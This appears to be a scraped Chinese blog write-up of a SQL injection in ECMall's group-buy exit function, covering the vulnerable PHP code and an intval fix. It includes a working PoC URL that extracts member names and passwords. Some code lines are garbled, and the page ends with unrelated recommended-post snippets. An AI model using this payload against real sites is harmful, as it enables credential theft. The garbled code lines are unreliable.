catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

Relevant Link:

2. 漏洞触发条件

0x1: POC

http://localhost/ecmall/index.php?app=buyer_groupbuy&act=exit_group&id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b

3. 漏洞影响范围
4. 漏洞代码分析

/app/buyer_groupbuy.app.php

function exit_group()

{

    //未对$id进行规范化过滤,导致攻击者可以传入非int型数据

    $id = empty($_GET['id']) ?  : $_GET['id'];

    if (!$id)

    {

        $this->show_warning('no_such_groupbuy');

        return false;

    }

    // 判断是否能退团

    if (!$this->_ican($id, ACT))

    {

        $this->show_warning('Hacking Attempt');

        return;

    }

    $member_mod = &m('member');

    $member_mod->unlinkRelation('join_groupbuy', $this->visitor->info['user_id'], $id);

    $this->show_message('exit_groupbuy_succeed');

}

跟进if (!$this->_ican($id, ACT))

function _ican($id, $act = '')

{

    $state_permission = array(

        GROUP_PENDING   => array(),

        GROUP_ON        => array('view', 'exit_group'),

        GROUP_END       => array('view'),

        GROUP_FINISHED  => array('view', 'buy'),

        GROUP_CANCELED  => array('view')

    );

    $group = current($this->_member_mod->getRelatedData('join_groupbuy', $this->visitor->info['user_id'], array(

        'conditions' => 'gb.group_id=' . $id,   //传入未过滤的$id参数

        'order' => 'gb.group_id DESC',

        'fields' => 'gb.state,groupbuy_log.order_id'

    )));

    if (!$group)

    {

        return false; // 越权或没有该团购

    }

    else

    {

        $state_permission[GROUP_FINISHED] = $group['order_id'] >  ? array('view', 'view_order') : array('view', 'buy');

    }

    if (empty($act))

    {

        return $state_permission[$group['state']]; // 返回该团购此状态时允许的操作

    }

    return in_array($act, $state_permission[$group['state']]) ? true : false; // 该团购此状态是否允许执行此操作

}

继续跟进$this->_member_mod->getRelatedData
/eccore/model/mode.base.php

function getRelatedData($relation_name, $ids, $find_param = array())

{

    $relation_info = $this->getRelation($relation_name);

    $model =& m($relation_info['model']);

    if (empty($ids))

    {

        $this->_error('no_ids_to_assoc', $model->getName());

        return false;

    }

    if ($relation_info['type'] != HAS_MANY && $relation_info['type'] != HAS_AND_BELONGS_TO_MANY)

    {

        $this->_error('invalid_assoc_model', $model->getName());

        return false;

    }

    $alias = $model->alias;

    /* 如果是多对多关系,则连接的表的别名为指定别名或中间表名,否则为模型的别名 */

    if ($relation_info['type'] == HAS_AND_BELONGS_TO_MANY)

    {

        $be_related = $model->getRelation($relation_info['reverse']);

        $alias = isset($be_related['alias']) ? $be_related['alias'] : $be_related['middle_table'];

    }

    /* 构造查询条件 */

    $conditions = $alias . '.' . $relation_info['foreign_key'] . ' ' . db_create_in($ids);   //主键值限定

    $conditions .= $relation_info['ext_limit'] ?

                ' AND ' . $this->_getExtLimit($relation_info['ext_limit'], $alias)

                : '';

    $conditions .= is_string($find_param['conditions']) ? ' AND ' . $find_param['conditions'] : '';

    $find_param['conditions'] = $conditions;

    /* 查询字段 */

    $find_param['fields'] = !empty($find_param['fields']) ?

                    $find_param['fields'] . ',' . $alias . '.' .$relation_info['foreign_key']

                    : '';

    switch ($relation_info['type'])

    {

        case HAS_MANY:

        break;

        case HAS_AND_BELONGS_TO_MANY:

        $find_param['join']   = !empty($find_param['join'])   ?

                        $find_param['join'] . ',' . $relation_info['reverse']

                        : $relation_info['reverse'];

        empty($find_param['order']) && $find_param['order'] = $model->alias . ".{$model->prikey} DESC";

        $find_param['index_key'] = array($relation_info['foreign_key'], $model->prikey);

        break;

    }

    return $model->find($find_param);

}

5. 防御方法

/app/buyer_groupbuy.app.php

function exit_group()

{

    //通过intval进行规范化过滤

    //$id = empty($_GET['id']) ? 0 : $_GET['id'];

    $id = empty($_GET['id']) ?  : intval( $_GET['id'] );

    if (!$id)

    {

        $this->show_warning('no_such_groupbuy');

        return false;

    }

    // 判断是否能退团

    if (!$this->_ican($id, ACT))

    {

        $this->show_warning('Hacking Attempt');

        return;

    }

    $member_mod = &m('member');

    $member_mod->unlinkRelation('join_groupbuy', $this->visitor->info['user_id'], $id);

    $this->show_message('exit_groupbuy_succeed');

}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

ECMall /app/buyer_groupbuy.app.php SQL Injection Vul的更多相关文章

  1. ecshop /search.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 ...

  2. ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出 ...

  3. discuz /faq.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 . 通过获取管理员密码 . 对管理员密码进行破解.通过在cmd5.com ...

  4. ecshop /goods.php SQL Injection Vul

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: poc http://localhost ...

  5. ecshop /category.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://sebug.net/vuld ...

  6. ecshop /api/client/api.php、/api/client/includes/lib_api.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECShop存在一个盲注漏洞,问题存在于/api/client/api. ...

  7. ecshop /flow.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏 ...

  8. ecshop /includes/modules/payment/alipay.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/ ...

  9. dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 注射漏洞成功需要条件如下 . php magic_quotes_gpc= ...

随机推荐

  1. office2016各个版本 以及 解决visio搜索任何都提示无匹配项问题

    http://tieba.baidu.com/p/4089747196 版本:Office 2016 Visio 专业版 32位版文件名:SW_DVD5_Visio_Pro_2016_W32_ChnS ...

  2. cpu负载和利用率

    理解Linux系统负荷 linux里的CPU负载

  3. log4j2 与 spring mvc整合

    log4j2不仅仅是log4j的简单升级,而是整个项目的重构,官网地址:http://logging.apache.org/log4j/2.x/,大家可以从官网的介绍看出它相比log4j第1代的种种优 ...

  4. python数字图像处理(17):边缘与轮廓

    在前面的python数字图像处理(10):图像简单滤波 中,我们已经讲解了很多算子用来检测边缘,其中用得最多的canny算子边缘检测. 本篇我们讲解一些其它方法来检测轮廓. 1.查找轮廓(find_c ...

  5. web 前端常用组件【04】Datetimepicker 和 Lodop

    web项目中日期选择器和打印这两个功能是非常常见,将使用过的日期和打印控件,在这里总结归纳,为方便后面使用. 1.Datetimepicker a.官方API:http://www.bootcss.c ...

  6. 从零开始,将ASP.NET Core部署到Linux生产环境

    研究.NET Core已经一段时间了,一直都是在Windows上开发,这2天尝试着将公司一个很简单的内部Web项目改造成了ASP.NET Core,并且部署到Linux上.生产环境如下: Linux ...

  7. ASP.NET利用WINRar实现在线解压缩文件

    一.肯定是服务器必须装了winrar这个软件了. 二.创建Helper类,如下: using System; using System.Collections.Generic; using Syste ...

  8. [转]Spring注解原理的详细剖析与实现

    原文地址:http://freewxy.iteye.com/blog/1149128/ 本文主要分为三部分: 一.注解的基本概念和原理及其简单实用 二.Spring中如何使用注解 三.编码剖析spri ...

  9. [转]hibernate在eclipse的逆向工程生成hbm.xml和bean类

    原文地址:http://www.xuebuyuan.com/210489.html 以前一直用myelipse,在myeclipse做hibernate逆向工程倒是很顺手了. 可是最近改用eclips ...

  10. jsp内置对象作业1-用户登录

    题目:编写一个jsp程序,实现用户登录,当用户输入的用户名或密码错误时,将页面重定向到错误提示也,并在该页面显示30秒后,自动返回到用户登录页面. 1.用户登录页面 <%@ page langu ...